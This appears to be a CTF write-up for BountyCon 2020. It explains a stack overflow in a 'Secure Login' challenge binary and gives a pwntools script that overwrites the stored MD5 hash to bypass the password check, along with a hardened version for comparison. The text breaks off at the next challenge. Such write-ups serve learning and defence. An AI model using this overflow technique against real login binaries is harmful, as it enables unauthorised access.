BountyCon 2020

The BountyCon2020 CTF is sponsored by Facebook, and the top 20 people from the APAC region will be invited to the invitation-only conference in Singapore.

I solved all the challenges in the CTF, I really enjoyed playing it, and I am invited to the conference.

1. Secure Login

It's an easy binary exploitation challenge. The binary asks for a password and the check is md5(password) == "hash". We can't recover the password from the hash (a preimage), though MD5 collisions can be found in reasonable time. There is a buffer overflow in the password buffer, and the stored hash sits directly after it on the stack: for example, the password buffer is at rbp-0x58 and the hash at rbp-0x30. Since the password buffer overflows, the same write also overwrites the hash, so we can send a password followed by that password's own MD5 digest.

Exploit

from pwn import *
from hashlib import md5

p = remote("localhost", 10000)
# p = remote("ec2-3-11-37-224.eu-west-2.compute.amazonaws.com", 10000)

# Bytes that fill the password buffer up to the stored hash. The binary hashes
# this password, so the hash we overwrite must be its MD5 digest
# (dat was undefined in the original snippet; assumed to be the filler bytes).
dat = b"a" * 0x81
payload = dat + md5(dat).digest()  # the digest lands on top of the stored hash

p.sendafter(b"Password: ", payload)
p.interactive()
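As an added illustration (not part of the original writeup), the following Python models the stack layout the text describes and runs the vulnerable comparison beside a bounded, constant-time version. It assumes the writeup's example offsets (password at rbp-0x58, hash at rbp-0x30, so a 0x28-byte password field with the 16-byte digest right after it) and assumes the binary hashes the whole fixed-size password field; the secret and the frame model are constructed for the example.

```python
from hashlib import md5
from hmac import compare_digest

# Layout taken from the writeup's example offsets: password at rbp-0x58,
# stored hash at rbp-0x30, so the password field is 0x28 bytes and the
# 16-byte MD5 digest sits directly after it.
PASSWORD_SIZE = 0x58 - 0x30
DIGEST_SIZE = 16
FRAME_SIZE = PASSWORD_SIZE + DIGEST_SIZE

# Constructed secret; the real binary only embeds its hash.
SECRET = b"constructed-secret"


def field_digest(password_field: bytes) -> bytes:
    """Assumption: the binary hashes the whole fixed-size field, NUL padding included."""
    field = password_field.ljust(PASSWORD_SIZE, b"\0")[:PASSWORD_SIZE]
    return md5(field).digest()


def make_frame(secret: bytes) -> bytearray:
    """Stack frame as the binary sees it before the prompt: empty field, then the hash."""
    frame = bytearray(FRAME_SIZE)
    frame[PASSWORD_SIZE:] = field_digest(secret)
    return frame


def check_vulnerable(frame: bytearray, user_input: bytes) -> bool:
    """Unbounded gets()-style copy into the password field, then compare."""
    # Bytes beyond the frame would hit saved registers; outside this model.
    n = min(len(user_input), FRAME_SIZE)
    frame[:n] = user_input[:n]  # a long input keeps writing into the hash field
    password = bytes(frame[:PASSWORD_SIZE])
    stored = bytes(frame[PASSWORD_SIZE:])
    return field_digest(password) == stored


def check_hardened(frame: bytearray, user_input: bytes) -> bool:
    """Bounded copy keeps the write inside the field; constant-time compare."""
    n = min(len(user_input), PASSWORD_SIZE - 1)  # leave room for the terminator
    frame[:n] = user_input[:n]
    frame[n:PASSWORD_SIZE] = b"\0" * (PASSWORD_SIZE - n)
    password = bytes(frame[:PASSWORD_SIZE])
    stored = bytes(frame[PASSWORD_SIZE:])
    return compare_digest(field_digest(password), stored)


def overflow_payload() -> bytes:
    """Same shape as the writeup's payload: fill the field, then append that fill's digest."""
    fill = b"a" * PASSWORD_SIZE
    return fill + md5(fill).digest()


if __name__ == "__main__":
    # The legitimate secret passes both checks.
    print("vulnerable, secret :", check_vulnerable(make_frame(SECRET), SECRET))
    print("hardened,   secret :", check_hardened(make_frame(SECRET), SECRET))
    # The overflow passes only the unbounded version, since it rewrote the hash.
    print("vulnerable, overflow:", check_vulnerable(make_frame(SECRET), overflow_payload()))
    print("hardened,   overflow:", check_hardened(make_frame(SECRET), overflow_payload()))
```

The hardened check differs in two ways that matter here: the copy is bounded by the field size, so the stored digest can never be reached from the input, and the comparison uses compare_digest so the byte-by-byte timing of the match leaks nothing about the stored value.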

I expected a few more binary exploitation challenges, but this was the only one given.

2. Lighthouse

Its